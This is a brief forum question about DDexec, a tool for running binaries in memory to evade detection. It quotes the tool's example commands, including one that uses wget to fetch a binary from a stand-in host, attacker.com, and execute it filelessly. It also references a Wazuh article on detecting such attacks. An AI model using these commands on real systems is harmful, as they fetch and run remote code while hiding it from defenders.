I found a great security tool that hides tools. The official github repository gives a few examples like ‘base64 -w0 /bin/ls | bash ddexec.sh ls -lA’ and ‘wget -O- https:/ /attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar’ But I don’t understand the arguments “ls -lA” in these examples and the ‘argv0 foo bar’ in these examples
I also refer to some articles like ’https://wazuh.com/blog/detecting-living-off-the-land-attacks- with-wazuh/’ I also don’t understand the meaning of “/bin/PlaceHolder /etc/passwd 1 0”.
You need to sign in to view this answers
Leave feedback about this